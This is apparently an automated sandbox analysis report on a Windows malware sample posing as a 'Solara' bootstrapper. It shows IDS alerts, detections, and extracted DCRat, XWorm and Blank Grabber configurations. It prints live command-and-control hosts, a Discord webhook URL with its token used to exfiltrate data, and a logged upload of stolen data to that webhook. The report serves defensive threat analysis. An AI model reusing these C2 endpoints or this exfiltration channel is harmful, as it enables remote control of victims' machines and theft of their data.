ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 141.8.192.93

Timestamp:	2024-08-05T14:32:30.632038+0200
SID:	2034194
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 141.8.192.93

Timestamp:	2024-08-05T14:33:59.086310+0200
SID:	2034194
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 141.8.192.93

Timestamp:	2024-08-05T14:33:28.018339+0200
SID:	2034194
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 147.185.221.21

Timestamp:	2024-08-05T14:32:59.511299+0200
SID:	2855924
Source Port:	49745
Destination Port:	27573
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 141.8.192.93

Timestamp:	2024-08-05T14:33:10.882003+0200
SID:	2034194
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 141.8.192.93

Timestamp:	2024-08-05T14:33:41.063699+0200
SID:	2034194
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Vjy8d2EoqK.exe	Avira: detected
Source: Vjy8d2EoqK.exe	Avira: detected
Source: Vjy8d2EoqK.exe	Avira: detected

Antivirus detection for dropped file

Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Brokercrt\comReviewsession.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Recovery\powershell.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: DCRat {"SCRT": "{\"L\":\"\",\"X\":\"~\",\"S\":\",\",\"W\":\"(\",\"d\":\"@\",\"A\":\"$\",\"M\":\"<\",\"j\":\"`\",\"h\":\"\|\",\"Q\":\"#\",\"w\":\"-\",\"9\":\")\",\"C\":\";\",\"4\":\" \",\"H\":\"!\",\"B\":\"%\",\"0\":\"^\",\"y\":\"&\",\"3\":\">\",\"J\":\".\",\"5\":\"_\"}", "PCRT": "{\"f\":\"$\",\"6\":\".\",\"S\":\"-\",\"Q\":\"~\",\"c\":\"`\",\"i\":\"^\",\"b\":\"_\",\"M\":\"(\",\"w\":\"<\",\"e\":\">\",\"j\":\")\",\"l\":\"&\",\"I\":\" \",\"=\":\"#\",\"y\":\";\",\"X\":\",\",\"D\":\"!\",\"p\":\"%\",\"0\":\"\",\"x\":\"\|\"}", "TAG": "", "MUTEX": "DCR_MUTEX-8bX0OVuOnvbm27qz2KER", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": null, "AS": false, "ASO": false, "AD": false, "H1": "http://a1009150.xsph.ru/@==gbJBzYuFDT", "H2": "http://a1009150.xsph.ru/@==gbJBzYuFDT", "T": "0"}
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	Malware Configuration Extractor: Xworm {"C2 url": ["cash-spoken.gl.at.ply.gg"], "Port": "27573", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: Built.exe.6252.3.memstrmin	Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discordapp.com/api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq"}

Multi AV Scanner detection for dropped file

Source: C:\Brokercrt\comReviewsession.exe	ReversingLabs: Detection: 87%
Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\jDownloader\iKSiRODBDWoPAMSDKBDQBFN.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	ReversingLabs: Detection: 87%
Source: C:\Recovery\powershell.exe	ReversingLabs: Detection: 87%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\iKSiRODBDWoPAMSDKBDQBFN.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\Built.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\XClient.exe	ReversingLabs: Detection: 91%
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\addins\cmd.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\apppatch\en-US\conhost.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: Vjy8d2EoqK.exe	ReversingLabs: Detection: 92%
Source: Vjy8d2EoqK.exe	Virustotal: Detection: 84%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Joe Sandbox ML: detected
Source: C:\Brokercrt\comReviewsession.exe	Joe Sandbox ML: detected
Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Joe Sandbox ML: detected
Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Joe Sandbox ML: detected
Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	Joe Sandbox ML: detected
Source: C:\Recovery\powershell.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Vjy8d2EoqK.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	String decryptor: cash-spoken.gl.at.ply.gg
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	String decryptor: 27573
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	String decryptor: <123456789>
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	String decryptor: <Xwormmm>
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	String decryptor: XWorm V5.2
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	String decryptor: USB.exe
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	String decryptor: %AppData%
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack	String decryptor: XClient.exe

Source: Vjy8d2EoqK.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Brokercrt\comReviewsession.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
Source: C:\Brokercrt\comReviewsession.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\6cb0b6c459d5d3
Source: C:\Brokercrt\comReviewsession.exe	Directory created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe
Source: C:\Brokercrt\comReviewsession.exe	Directory created: C:\Program Files\7-Zip\Lang\18607e77f76bf7

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vjy8d2EoqK.exe, 00000000.00000003.1694720616.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchosts.exe, 00000002.00000003.1703373977.0000000006D29000.00000004.00000020.00020000.00000000.sdmp, svchosts.exe, 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmp, svchosts.exe, 00000002.00000000.1694475780.00000000002C3000.00000002.00000001.01000000.00000006.sdmp, svchosts.exe, 00000002.00000003.1704318738.00000000055C7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Built.exe, 00000003.00000002.2060889895.00007FFDF7140000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Built.exe
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: Built.exe, 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: Built.exe, 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbv source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Built.exe, 00000001.00000003.1690578642.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2073776444.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Built.exe, 00000001.00000003.1690578642.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2073776444.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: symbols\dll\mscorlib.pdbpdb` source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-1_1.pdb source: Built.exe, Built.exe, 00000003.00000002.2063693974.00007FFDF74E2000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: .pdb! source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: Built.exe, 00000003.00000002.2066532868.00007FFDFB63B000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb source: Built.exe, Built.exe, 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: Built.exe, 00000003.00000002.2072519669.00007FFE130C1000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: Built.exe, 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Built.exe, 00000003.00000002.2073120722.00007FFE13221000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Built.exe, Built.exe, 00000003.00000002.2068139696.00007FFE10301000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: XClient.exe, 00000006.00000002.2805106909.000000000137B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbzS source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Built.exe, 00000003.00000002.2071781331.00007FFE126EC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb6SK source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Built.exe, 00000003.00000002.2072230759.00007FFE12E11000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Built.exe, 00000003.00000002.2071781331.00007FFE126EC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Built.exe, 00000003.00000002.2069831298.00007FFE11ED1000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbxC source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb+ source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Built.exe, 00000003.00000002.2068410527.00007FFE11511000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Built.exe, 00000003.00000002.2068979662.00007FFE11EA1000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: indoC:\Windows\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Built.exe, Built.exe, 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C85A0 FindFirstFileExW,FindClose,	1_2_00007FF76D5C85A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF76D5C79B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF76D5E0B84
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	2_2_0029A5F4
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002AB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	2_2_002AB8E0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C85A0 FindFirstFileExW,FindClose,	3_2_00007FF76D5C85A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	3_2_00007FF76D5C79B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00007FF76D5E0B84

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cash-spoken.gl.at.ply.gg
Source: Malware configuration extractor	URLs: http://a1009150.xsph.ru/@==gbJBzYuFDT

Yara detected Generic Downloader

Source: Yara match	File source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49745 -> 147.185.221.21:27573

Source: global traffic	HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 147.185.221.21 147.185.221.21
Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: SALSGIVERUS SALSGIVERUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1User-Agent: SolaraHost: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2

Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp

String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: blank-curro.in
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discordapp.com
Source: global traffic	DNS traffic detected: DNS query: cash-spoken.gl.at.ply.gg

Source: unknown

HTTP traffic detected: POST /api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq HTTP/1.1Host: discordapp.comAccept-Encoding: identityContent-Length: 688920User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=0e3213dce644b7bfaf68d16c9fe0b5b3

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Mon, 05 Aug 2024 12:32:06 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: B090:27A6E7:1689912:191F432:66B0C646Accept-Ranges: bytesDate: Mon, 05 Aug 2024 12:32:08 GMTVia: 1.1 varnishX-Served-By: cache-ewr18173-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1722861128.013060,VS0,VE9Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: d42a565218eb15c8bad48e7c7ffb3796b47dc347Expires: Mon, 05 Aug 2024 12:37:08 GMTSource-Age: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Mon, 05 Aug 2024 12:32:06 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 12:32:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=cc102cbe532611efb691ee972d83bda8; Expires=Sat, 04-Aug-2029 12:32:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomainsx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1722861158x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7l2Y0cbTqAvp9FnXw%2Fn5Qe08%2BJ3iJfctX0ftX9zN%2F9FZo7aOhzp6m9g5eW61JyzYYhpuEFYJAL9S1R5djAKmMIZnsprSWC94yVsG0NbVHdCVzs%2B9PHVF6rcm4XPJFe9i"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __sdcfduid=cc102cbe532611efb691ee972d83bda82e7f3f39958e45967b3cc47046cb9666bba02bd08ddaaa28342cb9067cb06e2d; Expires=Sat, 